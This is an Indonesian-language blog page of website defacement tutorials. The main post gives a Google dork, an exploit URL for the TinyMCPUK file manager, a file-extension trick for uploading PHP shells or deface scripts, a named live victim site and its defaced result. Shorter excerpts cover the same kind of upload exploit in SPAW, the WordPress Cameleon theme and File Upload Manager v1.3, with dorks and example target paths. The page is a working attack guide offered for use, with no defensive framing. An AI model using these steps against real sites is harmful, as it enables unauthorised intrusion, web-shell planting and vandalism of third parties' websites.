Deface Tinymcpuk mediatech

Kembali lagi dengan Sayah; v
Oke aja langsung gasken ke tutor nyah;v

Bahan & Alat
1. Hp/pc
2. Browser kesayangan
3. Dork : All rights reserved. © 2015 Media Tech Indonesia
4. Exploit : /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
5. Shell/Script deface. Extensi tambahin .fla

HTML : asw.htm.fla
PHP : asw.php.fla

Live Target
http://www.rentalmobilsurabaya.org/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Langkah-langkah :
1. Dorking dulu lah sampe nemu target, buat belajar tu diatas ada live.

2. Udah nemu target? Masukkin exploitnya, contoh :

target.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

3. Lihat bawah......
Ada tuh tempat upload, ya udah tinggal upload, mau shell/script deface, w nitip aja yak :v ya kerna emang ga support php cuk :'v

4. Jika sudah upload, tinggal panggil scriptnya seperti ini.

target.com/tinymcpuk/gambar/Flash/asw.php.fla

Hasil :
http://www.rentalmobilsurabaya.org/tinymcpuk/gambar/Flash/tt.htm.fla

Sekian ae ya cuk :v

Komentar

Postingan populer dari blog ini

Cara Deface spaw upload

Deface Spaw Upload Vulnerability + Live Target

Bahan-bahan :
1. HP/PC
2. Kuota (wajib)
3. Jembud (wajib)
4. Dork :

** inurl:"spaw2/upload/files/"

5. Script deface.

** ext : .txt / .html

6. Exploit :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Langkah-langkah :
1. Dorking lah njink kek biasa.

2. Jika udah nemu masukkan exploit nya, seperti dibawah.

www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

atau

www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

3. Cari tulisan image, pencet, rubah jadi file.

4. Pilih file, upload.

5. Cari filenya, cari tulisan "download file"

6. Pencet tuh, auto ke tab baru..

Udah deh, kelar..

…

Baca selengkapnya

Deface metode wp chameleon

Assalamualaikum wr wb
Kembali lagi dengan Sayah Randi;v
Oke jangan banyak bacot langsung aja ke tutor nya;v
• Bahan bahan :
1. Android/PC
2. kuota/WiFi
3. Script Deface
4. Tools Crsf > Touch Me Senpai

> Dork :
- inurl:/wp-content/themes/cameleon/
> Exploit :
- /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

• Langkah- langkah :

Pertama kalian dorking google dulu pakek dork di atas.

Nahh kalo udah pilih salah satu web nya.
Nahh sekarang tinggal nentuin vuln apa kaga nya.Caranya? Masukin exploit di atas.

Ex : www.target.coli/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Kalo vuln kek gambar di bawah ini.
Nah klo udah begitu kita tinggal ke crsf nya

Kolom URL isi link web vuln tadi,POST File isi dengan qqfile kemudian klik Kunci.

Baca selengkapnya

Deface Dengan File Upload Manager v1.3 Rename To

Deface File Upload Manager v1.3 Rename To

Oke karna saya gak bisa banyak bacot langsung aja gasken ke tutor nya

Siapkan:
**Bahan Bahannya

• Dork
"File Upload Manager v1.3" "rename to" "file types allowed"
• Script Deface
Ex : htm , txt
Contoh Script : tutorial.htm

Dorking dulu di google seperti biasa!
Contoh web vuln ada form uploadnya seperti gambar di bawah!

• Langsung upload aja ! 4. Langsung upload aja gan! Kalo seperti dalam gambar itu berarti sukses:)

Cara liat hasilnya gmna?? Mudah banget! • sitetarget.co.il/[path]/store/namafile.htm
Contoh: • https://filesmarcinx125.prv.pl/store/eue.htm

Baca selengkapnya

Ngapain belajar? Bukan Tempatnya:v

Cari Blog Ini